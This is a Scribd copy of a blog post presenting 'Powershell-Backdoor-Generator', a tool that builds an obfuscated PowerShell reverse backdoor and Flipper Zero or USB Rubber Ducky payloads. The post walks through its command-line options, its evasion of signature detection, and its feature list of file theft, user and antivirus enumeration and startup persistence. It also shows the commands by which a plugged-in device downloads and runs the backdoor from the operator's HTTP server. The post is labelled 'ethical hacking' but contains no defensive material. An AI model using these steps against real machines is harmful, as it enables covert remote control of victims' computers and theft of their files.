Scribd Logo
Upload

Welcome to Scribd!

  • 78 views

    Powershell-Backdoor-Generator - To Create A Flipper Zero - Hak5 U

    Uploaded by

    enzobouraima

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd

    Powershell-Backdoor-Generator - To Create A Flipper Zero - Hak5 U

    Uploaded by

    enzobouraima
    78 views7 pages

    Original Title

    Powershell-Backdoor-Generator _ To Create A Flipper Zero_ Hak5 U

    Copyright

    © © All Rights Reserved

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Download as pdf or txt
    78 views7 pages

    Powershell-Backdoor-Generator - To Create A Flipper Zero - Hak5 U

    Uploaded by

    enzobouraima

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Download as pdf or txt
    of 7

    Codelivly  

    Home » Ethical hacking » Powershell-Backdoor-Generator : To Create A Flipper Zero/ Hak5 USB Rubber Ducky Payload

    ETHICAL HACKING

    Powershell-Backdoor-Generator : To
    Create A Flipper Zero/ Hak5 USB Rubber
    Ducky Payload
    By Rocky ◆ March 5, 2023  No Comments  3 Mins Read

     Share     

    Powershell-Backdoor-Generator is a reverse backdoor written in Powershell and obfuscated


    with Python. Allowing the backdoor to have a new signature after every build. With the
    capabilties to create a Flipper Zero/ Hak5 USB Rubber ducky payload.

    usage: listen.py [-h] [--ip-address IP_ADDRESS] [--port PORT] [--random] [-


    -out OUT] [--verbose] [--delay DELAY] [--flipper FLIPPER] [--ducky]
    [--server-port SERVER_PORT] [--payload PAYLOAD] [--list--p
    ayloads] [-k KEYBOARD] [-L] [-H]

    Powershell Backdoor Generator

    options:
    -h, --help show this help message and exit
    --ip-address IP_ADDRESS, -i IP_ADDRESS
    IP Address to bind the backdoor too (default: 192.1
    68.X.XX)
    --port PORT, -p PORT Port for the backdoor to connect over (default: 444
    4)
    --random, -r Randomizes the outputed backdoor's file name
    --out OUT, -o OUT Specify the backdoor filename (relative file names)
    --verbose, -v Show verbose output
    --delay DELAY Delay in milliseconds before Flipper Zero/Ducky-Scr
    ipt payload execution (default:100)
    --flipper FLIPPER Payload file for flipper zero (includes EOL convers
    ion) (relative file name)
    --ducky Creates an inject.bin for the http server
    --server-port SERVER_PORT
    Port to run the HTTP server on (--server) (default:
    8080)
    --payload PAYLOAD USB Rubber Ducky/Flipper Zero backdoor payload to e
    xecute
    --list--payloads List all available payloads
    -k KEYBOARD, --keyboard KEYBOARD
    Keyboard layout for Bad Usb/Flipper Zero (default:
    us)
    -A, --actually-listen
    Just listen for any backdoor connections
    -H, --listen-and-host
    Just listen for any backdoor connections and host t
    he backdoor directory
    Features
    Hak5 Rubber Ducky payload
    Flipper Zero payload
    Download Files from remote system
    Play wav files from a URL
    Fetch target computers public IP address
    List local users
    Find Intresting Files
    Enumerate OS Information
    Find BIOS Information
    Get Anti-Virus Status
    Get Active TCP Clients
    Install Choco (https://chocolatey.org/)
    Checks for common pentesting software installed

    Standard backdoor

    C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\listen.py --verbose


    [*] Encoding backdoor script
    [*] Saved backdoor backdoor.ps1 sha1:32b9ca5c3cd088323da7aed161a788709d171b71
    [*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop

    A file in the current working directory will be created called backdoor.ps1


    Backdoor Execution
    Tested on Windows 11, Windows 10 and Kali Linux

    powershell.exe -File backdoor.ps1 -ExecutionPolicy Unrestricted



    ┌──(drew kali)-[/home/drew/Documents]
    └─PS> ./backdoor.ps1

    Bad USB/ USB Rubber Ducky attacks


    When using any of these attacks you will be opening up a HTTP server hosting the backdoor.
    Once the backdoor is retrieved the HTTP server will be shutdown.

    Payloads
    Execute — Execute the backdoor
    BindAndExecute — Place the backdoor in the users temp directory, bind the backdoor to
    startup and then execute it. (Requires Admin)

    Flipper Zero Backdoor


    Below will generate a file called powershell_backdoor.txt, which when triggered on the Flipper
    will fetch the backdoor from your computer over HTTP and execute it.

    C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\listen.py --flipp


    er powershell_backdoor --payload execute
    [*] Started HTTP server hosting file: http://192.168.0.223:8989/backdoor.ps
    1
    [*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop

    Place the text file you specified (e.g: powershell_backdoor.txt) into your flipper zero. When
    the payload is executed it will download and execute backdoor.ps1

    Usb Rubber Ducky Backdoor


    Below is a tutorial on how to generate an inject.bin file for the Hak5 USB Rubber ducky
    C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\listen.py --duck
    y --payload BindAndExecute
    [*] Started HTTP server hosting file: http://192.168.0.223:8989/backdoor.ps
    1
    [*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop

    A file named inject.bin will be placed in your current working directory. Java is required for
    this feature. When the payload is executed it will download and execute backdoor.ps1

         

     PREVIOUS ARTICLE NEXT ARTICLE 

    ChatGPT Python Script to Automate Python Penetration Testing: How I


    Multiple Reports for Every Program control multiple Linux servers from one
    Using a Critical Open Source Component device

    Rocky     

    Rocky is a versatile author sharing in-depth tutorials on web development, AI, and ethical
    hacking. Unlock new possibilities and expand your knowledge with Rocky's empowering
    content.

    Related Posts

    CYBER SECURITY ETHICAL HACKING


    So You Want to Be a Hacker: 2024 Edition Multiple Ways To Exploiting HTTP
    May 8, 2024 Authentication
    March 30, 2024

    ETHICAL HACKING

    Bypassing Two-Factor Authentication


    March 30, 2024

    ADD A COMMENT

    Search … SEARCH

    Support Us

    ABOUT US
    This is the Codelivly blog. Here, you will find articles discussing various topics related to coding
    and programming. Our goal is to provide helpful resources and advice for beginners and
    experienced coders alike.

    RECENT POSTS

    So You Want to Be a Hacker: 2024 Edition


    What is Active Directory? A Beginner’s Guide
    Mastering Networking Fundamentals: A Comprehensive Guide for Hackers
    Multiple Ways To Exploiting HTTP Authentication
    Bypassing Two-Factor Authentication

    IMPORTANT PAGE

    About Us
    Advertise With Us
    Contact US
    Privacy Policy
    Refund Policy
    Write For Us

         

    © 2024 Codelivly. All Right Reserved

    You might also like